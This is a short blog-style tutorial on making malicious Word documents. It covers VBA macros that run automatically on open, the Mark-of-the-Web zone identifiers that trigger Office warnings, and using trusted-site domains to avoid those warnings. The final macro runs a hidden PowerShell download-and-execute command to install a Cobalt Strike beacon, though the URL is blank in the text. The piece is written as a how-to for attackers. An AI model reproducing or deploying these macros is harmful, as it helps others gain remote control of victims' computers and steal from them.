Creating Malicious word documents

4 min readNov 30, 2022

Hi readers, here we will be looking into creating malicious word documents with the intent of running system commands using macro functionality. Below is the sample VBA code for automatically opening notepad.exe.

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("")
Shell.Run "notepad"

End Sub

Steps to add VBA macro in MS-word-

a) Go to View-> Macros

b) Macros window will pop up. Here we need to give a macro name and choose a word document for which we are creating a macro and then click Create.

c) Edit the macro-

d) Save the file, exit, and reopen. Notepad will run automatically upon opening.

Some of the other functions which we can use are-

  • AutoOpen runs each time you open an existing document.
  • AutoExit runs when you exit Word.
  • AutoExec runs when you start Word.
  • AutoNew runs each time you create a new document.
  • AutoClose runs each time you close a document.

There is a security mechanism in windows that enables additional scrutiny for files downloaded from the internet or other sources. This is achieved using Mark-of-the-Web (abbreviated MOTW), which uses alternate data streams(a feature of NTFS) for storing additional information on the origins of the file.

So If we download a file from the internet.

Let’s check if it has any Alternate Data Stream…

Get-Item -Path .\Report.doc -Stream *

Reading the “Zone.Identifier” datastream.

Get-Content .\Report.doc -Stream Zone.Identifier

ZoneId is 3 in this case as this file is downloaded from the internet. Following are the possible ZoneIds according to the source of the file…

  • 0 => Local computer
  • 1 => Local intranet
  • 2 => Trusted sites
  • 3 => Internet
  • 4 => Restricted sites

Interesting, Isn’t it? Let’s see how this “Trusted Sites” identifier works

Let’s add the “” subdomain to the trusted list-

a. Run “C:\Windows\System32\inetcpl.cpl

b. Add trusted site-

Now let’s see if it has any changes to Zone.Identifier Alternate Data Stream…

and this time we have ZoneId 2.

According to these Ids, Microsoft products show security warnings/prompts.

For ZoneId 2 We get this in MS word.

For ZoneId 3 We get this in MS word.

So this means we need to add our domain either to trusted sites or use a domain that is already present in the trusted sites list.

Let’s deploy cobalt strike’s becon using Scripted Web Delivery via our malicious .doc file-

Sub AutoOpen()

Dim Shell As Object
Set Shell = CreateObject("")
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring(''))"""

End Sub

Save and reopen the document and check the cobalt client. We have a beacon!

Thanks for reading!